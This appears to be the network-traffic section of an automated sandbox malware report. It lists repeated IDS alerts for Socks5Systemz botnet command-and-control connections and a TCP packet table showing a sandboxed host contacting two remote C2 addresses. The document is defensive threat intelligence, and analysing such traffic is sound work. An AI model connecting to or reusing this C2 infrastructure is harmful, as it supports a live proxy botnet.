                                                            2024-10-07T03:42:39.564963+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.450040185.208.158.24880TCP
                                                            2024-10-07T03:42:39.564963+02002050112ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.450040185.208.158.24880TCP
                                                            2024-10-07T03:42:40.450609+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.450046185.208.158.24880TCP
                                                            2024-10-07T03:42:40.450609+02002050112ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.450046185.208.158.24880TCP
                                                            2024-10-07T03:42:41.291929+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.450049185.208.158.24880TCP
                                                            2024-10-07T03:42:41.291929+02002050112ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.450049185.208.158.24880TCP
                                                            2024-10-07T03:42:42.118606+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.450050185.208.158.24880TCP
                                                            2024-10-07T03:42:42.118606+02002050112ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.450050185.208.158.24880TCP
                                                            2024-10-07T03:42:42.464349+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.450050185.208.158.24880TCP
                                                            2024-10-07T03:42:42.464349+02002050112ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.450050185.208.158.24880TCP
                                                            2024-10-07T03:42:43.306353+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.450051185.208.158.24880TCP
                                                            2024-10-07T03:42:43.306353+02002050112ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.450051185.208.158.24880TCP
                                                            2024-10-07T03:42:43.655033+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.450051185.208.158.24880TCP
                                                            2024-10-07T03:42:43.655033+02002050112ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.450051185.208.158.24880TCP
                                                            2024-10-07T03:42:44.463476+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.450052185.208.158.24880TCP
                                                            2024-10-07T03:42:44.463476+02002050112ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.450052185.208.158.24880TCP
                                                            2024-10-07T03:42:45.282696+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.450053185.208.158.24880TCP
                                                            2024-10-07T03:42:45.282696+02002050112ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.450053185.208.158.24880TCP
                                                            2024-10-07T03:42:46.194451+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.450054185.208.158.24880TCP
                                                            2024-10-07T03:42:46.194451+02002050112ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.450054185.208.158.24880TCP
                                                            2024-10-07T03:42:47.051855+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.450055185.208.158.24880TCP
                                                            2024-10-07T03:42:47.051855+02002050112ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.450055185.208.158.24880TCP
                                                            2024-10-07T03:42:47.864174+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.450056185.208.158.24880TCP
                                                            2024-10-07T03:42:47.864174+02002050112ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.450056185.208.158.24880TCP
                                                            2024-10-07T03:42:48.674462+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.450057185.208.158.24880TCP
                                                            2024-10-07T03:42:48.674462+02002050112ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.450057185.208.158.24880TCP
                                                            2024-10-07T03:42:49.578425+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.450058185.208.158.24880TCP
                                                            2024-10-07T03:42:49.578425+02002050112ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.450058185.208.158.24880TCP
                                                            2024-10-07T03:42:50.395648+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.450059185.208.158.24880TCP
                                                            2024-10-07T03:42:50.395648+02002050112ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.450059185.208.158.24880TCP
                                                            2024-10-07T03:42:51.216894+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.450060185.208.158.24880TCP
                                                            2024-10-07T03:42:51.216894+02002050112ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.450060185.208.158.24880TCP
                                                            2024-10-07T03:42:52.047574+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.450061185.208.158.24880TCP
                                                            2024-10-07T03:42:52.047574+02002050112ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.450061185.208.158.24880TCP
                                                            2024-10-07T03:42:52.909205+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.450062185.208.158.24880TCP
                                                            2024-10-07T03:42:52.909205+02002050112ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.450062185.208.158.24880TCP
                                                            2024-10-07T03:42:53.787719+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.450063185.208.158.24880TCP
                                                            2024-10-07T03:42:53.787719+02002050112ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.450063185.208.158.24880TCP
                                                            2024-10-07T03:42:54.697841+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.450064185.208.158.24880TCP
                                                            2024-10-07T03:42:54.697841+02002050112ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.450064185.208.158.24880TCP
                                                            2024-10-07T03:42:55.515668+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.450065185.208.158.24880TCP
                                                            2024-10-07T03:42:55.515668+02002050112ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.450065185.208.158.24880TCP
                                                            2024-10-07T03:42:56.351204+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.450066185.208.158.24880TCP
                                                            2024-10-07T03:42:56.351204+02002050112ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.450066185.208.158.24880TCP
                                                            2024-10-07T03:42:56.697681+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.450066185.208.158.24880TCP
                                                            2024-10-07T03:42:56.697681+02002050112ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.450066185.208.158.24880TCP
                                                            2024-10-07T03:42:57.534956+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.450067185.208.158.24880TCP
                                                            2024-10-07T03:42:57.534956+02002050112ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.450067185.208.158.24880TCP
                                                            2024-10-07T03:42:58.352171+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.450068185.208.158.24880TCP
                                                            2024-10-07T03:42:58.352171+02002050112ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.450068185.208.158.24880TCP
                                                            2024-10-07T03:42:59.285211+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.450069185.208.158.24880TCP
                                                            2024-10-07T03:42:59.285211+02002050112ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.450069185.208.158.24880TCP
                                                            2024-10-07T03:43:00.084617+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.450070185.208.158.24880TCP
                                                            2024-10-07T03:43:00.084617+02002050112ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.450070185.208.158.24880TCP
                                                            2024-10-07T03:43:00.913274+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.450071185.208.158.24880TCP
                                                            2024-10-07T03:43:00.913274+02002050112ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.450071185.208.158.24880TCP
                                                            2024-10-07T03:43:01.715725+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.450072185.208.158.24880TCP
                                                            2024-10-07T03:43:01.715725+02002050112ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.450072185.208.158.24880TCP
                                                            2024-10-07T03:43:02.556919+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.450073185.208.158.24880TCP
                                                            2024-10-07T03:43:02.556919+02002050112ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.450073185.208.158.24880TCP
                                                            2024-10-07T03:43:03.413248+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.450074185.208.158.24880TCP
                                                            2024-10-07T03:43:03.413248+02002050112ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.450074185.208.158.24880TCP
                                                            2024-10-07T03:43:04.234323+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.450075185.208.158.24880TCP
                                                            2024-10-07T03:43:04.234323+02002050112ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.450075185.208.158.24880TCP
                                                            2024-10-07T03:43:05.059239+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.450076185.208.158.24880TCP
                                                            2024-10-07T03:43:05.059239+02002050112ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.450076185.208.158.24880TCP
                                                            2024-10-07T03:43:05.915772+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.450077185.208.158.24880TCP
                                                            2024-10-07T03:43:05.915772+02002050112ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.450077185.208.158.24880TCP
                                                            2024-10-07T03:43:06.740206+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.450078185.208.158.24880TCP
                                                            2024-10-07T03:43:06.740206+02002050112ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.450078185.208.158.24880TCP
                                                            2024-10-07T03:43:07.572459+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.450079185.208.158.24880TCP
                                                            2024-10-07T03:43:07.572459+02002050112ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.450079185.208.158.24880TCP
                                                            TimestampSource PortDest PortSource IPDest IP
                                                            Oct 7, 2024 03:41:57.452078104 CEST4974780192.168.2.4185.208.158.248
                                                            Oct 7, 2024 03:41:57.457638979 CEST8049747185.208.158.248192.168.2.4
                                                            Oct 7, 2024 03:41:57.457971096 CEST4974780192.168.2.4185.208.158.248
                                                            Oct 7, 2024 03:41:57.458060026 CEST4974780192.168.2.4185.208.158.248
                                                            Oct 7, 2024 03:41:57.463454008 CEST8049747185.208.158.248192.168.2.4
                                                            Oct 7, 2024 03:41:58.187577963 CEST8049747185.208.158.248192.168.2.4
                                                            Oct 7, 2024 03:41:58.187836885 CEST4974780192.168.2.4185.208.158.248
                                                            Oct 7, 2024 03:41:58.189968109 CEST497542023192.168.2.489.105.201.183
                                                            Oct 7, 2024 03:41:58.195327044 CEST20234975489.105.201.183192.168.2.4
                                                            Oct 7, 2024 03:41:58.195439100 CEST497542023192.168.2.489.105.201.183
                                                            Oct 7, 2024 03:41:58.195493937 CEST497542023192.168.2.489.105.201.183
                                                            Oct 7, 2024 03:41:58.200800896 CEST20234975489.105.201.183192.168.2.4
                                                            Oct 7, 2024 03:41:58.200891018 CEST497542023192.168.2.489.105.201.183
                                                            Oct 7, 2024 03:41:58.206074953 CEST20234975489.105.201.183192.168.2.4
                                                            Oct 7, 2024 03:41:58.796897888 CEST20234975489.105.201.183192.168.2.4
                                                            Oct 7, 2024 03:41:58.849261999 CEST497542023192.168.2.489.105.201.183
                                                            Oct 7, 2024 03:42:00.804229975 CEST4974780192.168.2.4185.208.158.248
                                                            Oct 7, 2024 03:42:00.809685946 CEST8049747185.208.158.248192.168.2.4
                                                            Oct 7, 2024 03:42:01.054673910 CEST8049747185.208.158.248192.168.2.4
                                                            Oct 7, 2024 03:42:01.054786921 CEST4974780192.168.2.4185.208.158.248
                                                            Oct 7, 2024 03:42:01.163775921 CEST4974780192.168.2.4185.208.158.248
                                                            Oct 7, 2024 03:42:01.168637037 CEST8049747185.208.158.248192.168.2.4
                                                            Oct 7, 2024 03:42:01.407448053 CEST8049747185.208.158.248192.168.2.4
                                                            Oct 7, 2024 03:42:01.407697916 CEST4974780192.168.2.4185.208.158.248
                                                            Oct 7, 2024 03:42:01.421200991 CEST497752023192.168.2.489.105.201.183
                                                            Oct 7, 2024 03:42:01.426733971 CEST20234977589.105.201.183192.168.2.4
                                                            Oct 7, 2024 03:42:01.426865101 CEST497752023192.168.2.489.105.201.183
                                                            Oct 7, 2024 03:42:01.426947117 CEST497752023192.168.2.489.105.201.183
                                                            Oct 7, 2024 03:42:01.426971912 CEST497752023192.168.2.489.105.201.183
                                                            Oct 7, 2024 03:42:01.432318926 CEST20234977589.105.201.183192.168.2.4
                                                            Oct 7, 2024 03:42:01.479233027 CEST20234977589.105.201.183192.168.2.4
                                                            Oct 7, 2024 03:42:01.539295912 CEST4974780192.168.2.4185.208.158.248
                                                            Oct 7, 2024 03:42:01.539680958 CEST4977680192.168.2.4185.208.158.248
                                                            Oct 7, 2024 03:42:01.544760942 CEST8049776185.208.158.248192.168.2.4
                                                            Oct 7, 2024 03:42:01.544826031 CEST8049747185.208.158.248192.168.2.4
                                                            Oct 7, 2024 03:42:01.544874907 CEST4977680192.168.2.4185.208.158.248
                                                            Oct 7, 2024 03:42:01.545008898 CEST4974780192.168.2.4185.208.158.248
                                                            Oct 7, 2024 03:42:01.545104027 CEST4977680192.168.2.4185.208.158.248
                                                            Oct 7, 2024 03:42:01.550263882 CEST8049776185.208.158.248192.168.2.4
                                                            Oct 7, 2024 03:42:01.874258995 CEST20234977589.105.201.183192.168.2.4
                                                            Oct 7, 2024 03:42:01.874439955 CEST497752023192.168.2.489.105.201.183
                                                            Oct 7, 2024 03:42:02.230324984 CEST8049776185.208.158.248192.168.2.4
                                                            Oct 7, 2024 03:42:02.230669975 CEST4977680192.168.2.4185.208.158.248
                                                            Oct 7, 2024 03:42:02.397274971 CEST4977680192.168.2.4185.208.158.248
                                                            Oct 7, 2024 03:42:02.397993088 CEST4978280192.168.2.4185.208.158.248
                                                            Oct 7, 2024 03:42:02.403294086 CEST8049776185.208.158.248192.168.2.4
                                                            Oct 7, 2024 03:42:02.403481007 CEST4977680192.168.2.4185.208.158.248
                                                            Oct 7, 2024 03:42:02.403614998 CEST8049782185.208.158.248192.168.2.4
                                                            Oct 7, 2024 03:42:02.403697968 CEST4978280192.168.2.4185.208.158.248
                                                            Oct 7, 2024 03:42:02.410440922 CEST4978280192.168.2.4185.208.158.248
                                                            Oct 7, 2024 03:42:02.415568113 CEST8049782185.208.158.248192.168.2.4
                                                            Oct 7, 2024 03:42:03.107878923 CEST8049782185.208.158.248192.168.2.4
                                                            Oct 7, 2024 03:42:03.108011961 CEST4978280192.168.2.4185.208.158.248
                                                            Oct 7, 2024 03:42:03.225788116 CEST4978280192.168.2.4185.208.158.248
                                                            Oct 7, 2024 03:42:03.226181030 CEST4978880192.168.2.4185.208.158.248
                                                            Oct 7, 2024 03:42:03.231256962 CEST8049782185.208.158.248192.168.2.4
                                                            Oct 7, 2024 03:42:03.231297970 CEST8049788185.208.158.248192.168.2.4
                                                            Oct 7, 2024 03:42:03.231331110 CEST4978280192.168.2.4185.208.158.248
                                                            Oct 7, 2024 03:42:03.231368065 CEST4978880192.168.2.4185.208.158.248
                                                            Oct 7, 2024 03:42:03.231547117 CEST4978880192.168.2.4185.208.158.248
                                                            Oct 7, 2024 03:42:03.236653090 CEST8049788185.208.158.248192.168.2.4
                                                            Oct 7, 2024 03:42:03.949457884 CEST8049788185.208.158.248192.168.2.4
                                                            Oct 7, 2024 03:42:03.949539900 CEST4978880192.168.2.4185.208.158.248
                                                            Oct 7, 2024 03:42:04.069123030 CEST4978880192.168.2.4185.208.158.248
                                                            Oct 7, 2024 03:42:04.069432020 CEST4979480192.168.2.4185.208.158.248
                                                            Oct 7, 2024 03:42:04.074676991 CEST8049794185.208.158.248192.168.2.4
                                                            Oct 7, 2024 03:42:04.074719906 CEST8049788185.208.158.248192.168.2.4
                                                            Oct 7, 2024 03:42:04.074896097 CEST4978880192.168.2.4185.208.158.248
                                                            Oct 7, 2024 03:42:04.075114965 CEST4979480192.168.2.4185.208.158.248
                                                            Oct 7, 2024 03:42:04.075114965 CEST4979480192.168.2.4185.208.158.248
                                                            Oct 7, 2024 03:42:04.080540895 CEST8049794185.208.158.248192.168.2.4
                                                            Oct 7, 2024 03:42:04.766669989 CEST8049794185.208.158.248192.168.2.4
                                                            Oct 7, 2024 03:42:04.766868114 CEST4979480192.168.2.4185.208.158.248
                                                            Oct 7, 2024 03:42:04.882801056 CEST4979480192.168.2.4185.208.158.248
                                                            Oct 7, 2024 03:42:04.883162022 CEST4980080192.168.2.4185.208.158.248
                                                            Oct 7, 2024 03:42:04.888034105 CEST8049794185.208.158.248192.168.2.4
                                                            Oct 7, 2024 03:42:04.888251066 CEST4979480192.168.2.4185.208.158.248
                                                            Oct 7, 2024 03:42:04.888345957 CEST8049800185.208.158.248192.168.2.4
                                                            Oct 7, 2024 03:42:04.888545036 CEST4980080192.168.2.4185.208.158.248
                                                            Oct 7, 2024 03:42:04.888660908 CEST4980080192.168.2.4185.208.158.248
                                                            Oct 7, 2024 03:42:04.893836021 CEST8049800185.208.158.248192.168.2.4
                                                            Oct 7, 2024 03:42:05.588555098 CEST8049800185.208.158.248192.168.2.4
                                                            Oct 7, 2024 03:42:05.592223883 CEST4980080192.168.2.4185.208.158.248
                                                            Oct 7, 2024 03:42:05.710635900 CEST4980080192.168.2.4185.208.158.248
                                                            Oct 7, 2024 03:42:05.710886955 CEST4980680192.168.2.4185.208.158.248
                                                            Oct 7, 2024 03:42:05.715909004 CEST8049806185.208.158.248192.168.2.4
                                                            Oct 7, 2024 03:42:05.715928078 CEST8049800185.208.158.248192.168.2.4
                                                            Oct 7, 2024 03:42:05.716294050 CEST4980080192.168.2.4185.208.158.248
                                                            Oct 7, 2024 03:42:05.716468096 CEST4980680192.168.2.4185.208.158.248
                                                            Oct 7, 2024 03:42:05.716468096 CEST4980680192.168.2.4185.208.158.248
                                                            Oct 7, 2024 03:42:05.721746922 CEST8049806185.208.158.248192.168.2.4
                                                            Oct 7, 2024 03:42:06.406331062 CEST8049806185.208.158.248192.168.2.4
                                                            Oct 7, 2024 03:42:06.406518936 CEST4980680192.168.2.4185.208.158.248
                                                            Oct 7, 2024 03:42:06.522926092 CEST4980680192.168.2.4185.208.158.248
                                                            Oct 7, 2024 03:42:06.523284912 CEST4981280192.168.2.4185.208.158.248
                                                            Oct 7, 2024 03:42:06.528156042 CEST8049806185.208.158.248192.168.2.4
                                                            Oct 7, 2024 03:42:06.528243065 CEST4980680192.168.2.4185.208.158.248
                                                            Oct 7, 2024 03:42:06.528443098 CEST8049812185.208.158.248192.168.2.4
                                                            Oct 7, 2024 03:42:06.528543949 CEST4981280192.168.2.4185.208.158.248
                                                            Oct 7, 2024 03:42:06.528795004 CEST4981280192.168.2.4185.208.158.248
                                                            Oct 7, 2024 03:42:06.533588886 CEST8049812185.208.158.248192.168.2.4
                                                            Oct 7, 2024 03:42:07.223495960 CEST8049812185.208.158.248192.168.2.4
                                                            Oct 7, 2024 03:42:07.223683119 CEST4981280192.168.2.4185.208.158.248
                                                            Oct 7, 2024 03:42:07.354830980 CEST4981280192.168.2.4185.208.158.248
                                                            Oct 7, 2024 03:42:07.355496883 CEST4981880192.168.2.4185.208.158.248
                                                            Oct 7, 2024 03:42:07.360150099 CEST8049812185.208.158.248192.168.2.4
                                                            Oct 7, 2024 03:42:07.360245943 CEST4981280192.168.2.4185.208.158.248
                                                            Oct 7, 2024 03:42:07.360379934 CEST8049818185.208.158.248192.168.2.4
                                                            Oct 7, 2024 03:42:07.360462904 CEST4981880192.168.2.4185.208.158.248
                                                            Oct 7, 2024 03:42:07.360582113 CEST4981880192.168.2.4185.208.158.248
                                                            Oct 7, 2024 03:42:07.365411997 CEST8049818185.208.158.248192.168.2.4
                                                            Oct 7, 2024 03:42:08.069431067 CEST8049818185.208.158.248192.168.2.4
                                                            Oct 7, 2024 03:42:08.069514036 CEST4981880192.168.2.4185.208.158.248
                                                            Oct 7, 2024 03:42:08.178628922 CEST4981880192.168.2.4185.208.158.248
                                                            Oct 7, 2024 03:42:08.183491945 CEST8049818185.208.158.248192.168.2.4
                                                            Oct 7, 2024 03:42:08.426958084 CEST8049818185.208.158.248192.168.2.4
                                                            Oct 7, 2024 03:42:08.427179098 CEST4981880192.168.2.4185.208.158.248
                                                            Oct 7, 2024 03:42:08.537981987 CEST4981880192.168.2.4185.208.158.248
                                                            Oct 7, 2024 03:42:08.538268089 CEST4982780192.168.2.4185.208.158.248
                                                            Oct 7, 2024 03:42:08.543461084 CEST8049818185.208.158.248192.168.2.4
                                                            Oct 7, 2024 03:42:08.543538094 CEST4981880192.168.2.4185.208.158.248
                                                            Oct 7, 2024 03:42:08.544203043 CEST8049827185.208.158.248192.168.2.4
                                                            Oct 7, 2024 03:42:08.544275045 CEST4982780192.168.2.4185.208.158.248
                                                            Oct 7, 2024 03:42:08.544418097 CEST4982780192.168.2.4185.208.158.248
                                                            Oct 7, 2024 03:42:08.550124884 CEST8049827185.208.158.248192.168.2.4
                                                            Oct 7, 2024 03:42:09.260485888 CEST8049827185.208.158.248192.168.2.4
                                                            Oct 7, 2024 03:42:09.260724068 CEST4982780192.168.2.4185.208.158.248
                                                            Oct 7, 2024 03:42:09.381855965 CEST4982780192.168.2.4185.208.158.248
                                                            Oct 7, 2024 03:42:09.382230997 CEST4983280192.168.2.4185.208.158.248
                                                            Oct 7, 2024 03:42:09.387144089 CEST8049832185.208.158.248192.168.2.4
                                                            Oct 7, 2024 03:42:09.387212992 CEST8049827185.208.158.248192.168.2.4
                                                            Oct 7, 2024 03:42:09.387238979 CEST4983280192.168.2.4185.208.158.248
                                                            Oct 7, 2024 03:42:09.387269020 CEST4982780192.168.2.4185.208.158.248
                                                            Oct 7, 2024 03:42:09.387324095 CEST4983280192.168.2.4185.208.158.248
                                                            Oct 7, 2024 03:42:09.392128944 CEST8049832185.208.158.248192.168.2.4
                                                            Oct 7, 2024 03:42:10.075603962 CEST8049832185.208.158.248192.168.2.4
                                                            Oct 7, 2024 03:42:10.075961113 CEST4983280192.168.2.4185.208.158.248
                                                            Oct 7, 2024 03:42:10.194731951 CEST4983280192.168.2.4185.208.158.248
                                                            Oct 7, 2024 03:42:10.195014000 CEST4983780192.168.2.4185.208.158.248
                                                            Oct 7, 2024 03:42:10.201242924 CEST8049837185.208.158.248192.168.2.4
                                                            Oct 7, 2024 03:42:10.201304913 CEST8049832185.208.158.248192.168.2.4
                                                            Oct 7, 2024 03:42:10.201335907 CEST4983780192.168.2.4185.208.158.248
                                                            Oct 7, 2024 03:42:10.201363087 CEST4983280192.168.2.4185.208.158.248
                                                            Oct 7, 2024 03:42:10.201489925 CEST4983780192.168.2.4185.208.158.248
                                                            Oct 7, 2024 03:42:10.206237078 CEST8049837185.208.158.248192.168.2.4
                                                            Oct 7, 2024 03:42:10.887078047 CEST8049837185.208.158.248192.168.2.4
                                                            Oct 7, 2024 03:42:10.887151957 CEST4983780192.168.2.4185.208.158.248
                                                            Oct 7, 2024 03:42:11.006726027 CEST4983780192.168.2.4185.208.158.248
                                                            Oct 7, 2024 03:42:11.006997108 CEST4984280192.168.2.4185.208.158.248
                                                            Oct 7, 2024 03:42:11.011883020 CEST8049837185.208.158.248192.168.2.4
                                                            Oct 7, 2024 03:42:11.011923075 CEST8049842185.208.158.248192.168.2.4
                                                            Oct 7, 2024 03:42:11.011941910 CEST4983780192.168.2.4185.208.158.248
                                                            Oct 7, 2024 03:42:11.012001038 CEST4984280192.168.2.4185.208.158.248
                                                            Oct 7, 2024 03:42:11.012134075 CEST4984280192.168.2.4185.208.158.248
                                                            Oct 7, 2024 03:42:11.016931057 CEST8049842185.208.158.248192.168.2.4
                                                            Oct 7, 2024 03:42:11.728082895 CEST8049842185.208.158.248192.168.2.4
                                                            Oct 7, 2024 03:42:11.728146076 CEST4984280192.168.2.4185.208.158.248
                                                            Oct 7, 2024 03:42:11.835010052 CEST4984280192.168.2.4185.208.158.248
                                                            Oct 7, 2024 03:42:11.839903116 CEST8049842185.208.158.248192.168.2.4
                                                            Oct 7, 2024 03:42:12.076751947 CEST8049842185.208.158.248192.168.2.4
                                                            Oct 7, 2024 03:42:12.076819897 CEST4984280192.168.2.4185.208.158.248
                                                            Oct 7, 2024 03:42:12.194363117 CEST4984280192.168.2.4185.208.158.248
                                                            Oct 7, 2024 03:42:12.194742918 CEST4985280192.168.2.4185.208.158.248
                                                            Oct 7, 2024 03:42:12.199771881 CEST8049842185.208.158.248192.168.2.4
                                                            Oct 7, 2024 03:42:12.199817896 CEST8049852185.208.158.248192.168.2.4
                                                            Oct 7, 2024 03:42:12.199843884 CEST4984280192.168.2.4185.208.158.248
                                                            Oct 7, 2024 03:42:12.199893951 CEST4985280192.168.2.4185.208.158.248
                                                            Oct 7, 2024 03:42:12.200057030 CEST4985280192.168.2.4185.208.158.248
                                                            Oct 7, 2024 03:42:12.205108881 CEST8049852185.208.158.248192.168.2.4
                                                            Oct 7, 2024 03:42:12.952456951 CEST8049852185.208.158.248192.168.2.4
                                                            Oct 7, 2024 03:42:12.952536106 CEST4985280192.168.2.4185.208.158.248
                                                            Oct 7, 2024 03:42:13.069156885 CEST4985280192.168.2.4185.208.158.248
                                                            Oct 7, 2024 03:42:13.069461107 CEST4985780192.168.2.4185.208.158.248
                                                            Oct 7, 2024 03:42:13.074450970 CEST8049857185.208.158.248192.168.2.4
                                                            Oct 7, 2024 03:42:13.074551105 CEST8049852185.208.158.248192.168.2.4
                                                            Oct 7, 2024 03:42:13.074611902 CEST4985280192.168.2.4185.208.158.248
                                                            Oct 7, 2024 03:42:13.074681997 CEST4985780192.168.2.4185.208.158.248
                                                            Oct 7, 2024 03:42:13.074764967 CEST4985780192.168.2.4185.208.158.248
                                                            Oct 7, 2024 03:42:13.079823017 CEST8049857185.208.158.248192.168.2.4
                                                            Oct 7, 2024 03:42:13.772974014 CEST8049857185.208.158.248192.168.2.4
                                                            Oct 7, 2024 03:42:13.773175955 CEST4985780192.168.2.4185.208.158.248
                                                            Oct 7, 2024 03:42:13.913865089 CEST4985780192.168.2.4185.208.158.248
                                                            Oct 7, 2024 03:42:13.914179087 CEST4986380192.168.2.4185.208.158.248
                                                            Oct 7, 2024 03:42:13.919197083 CEST8049863185.208.158.248192.168.2.4
                                                            Oct 7, 2024 03:42:13.919261932 CEST8049857185.208.158.248192.168.2.4
                                                            Oct 7, 2024 03:42:13.919289112 CEST4986380192.168.2.4185.208.158.248
                                                            Oct 7, 2024 03:42:13.919491053 CEST4985780192.168.2.4185.208.158.248
                                                            Oct 7, 2024 03:42:13.919517994 CEST4986380192.168.2.4185.208.158.248
                                                            Oct 7, 2024 03:42:13.924757004 CEST8049863185.208.158.248192.168.2.4
                                                            Oct 7, 2024 03:42:14.638581038 CEST8049863185.208.158.248192.168.2.4
                                                            Oct 7, 2024 03:42:14.638684034 CEST4986380192.168.2.4185.208.158.248
                                                            Oct 7, 2024 03:42:14.756751060 CEST4986380192.168.2.4185.208.158.248
                                                            Oct 7, 2024 03:42:14.757051945 CEST4986980192.168.2.4185.208.158.248
                                                            Oct 7, 2024 03:42:14.762063980 CEST8049863185.208.158.248192.168.2.4
                                                            Oct 7, 2024 03:42:14.762279987 CEST8049869185.208.158.248192.168.2.4
                                                            Oct 7, 2024 03:42:14.762341022 CEST4986380192.168.2.4185.208.158.248
                                                            Oct 7, 2024 03:42:14.762362003 CEST4986980192.168.2.4185.208.158.248
                                                            Oct 7, 2024 03:42:14.762514114 CEST4986980192.168.2.4185.208.158.248
                                                            Oct 7, 2024 03:42:14.767580032 CEST8049869185.208.158.248192.168.2.4
                                                            Oct 7, 2024 03:42:15.469583035 CEST8049869185.208.158.248192.168.2.4
                                                            Oct 7, 2024 03:42:15.469769955 CEST4986980192.168.2.4185.208.158.248
                                                            Oct 7, 2024 03:42:15.585035086 CEST4986980192.168.2.4185.208.158.248
                                                            Oct 7, 2024 03:42:15.585299015 CEST4987680192.168.2.4185.208.158.248
                                                            Oct 7, 2024 03:42:15.590234995 CEST8049876185.208.158.248192.168.2.4
                                                            Oct 7, 2024 03:42:15.590400934 CEST4987680192.168.2.4185.208.158.248
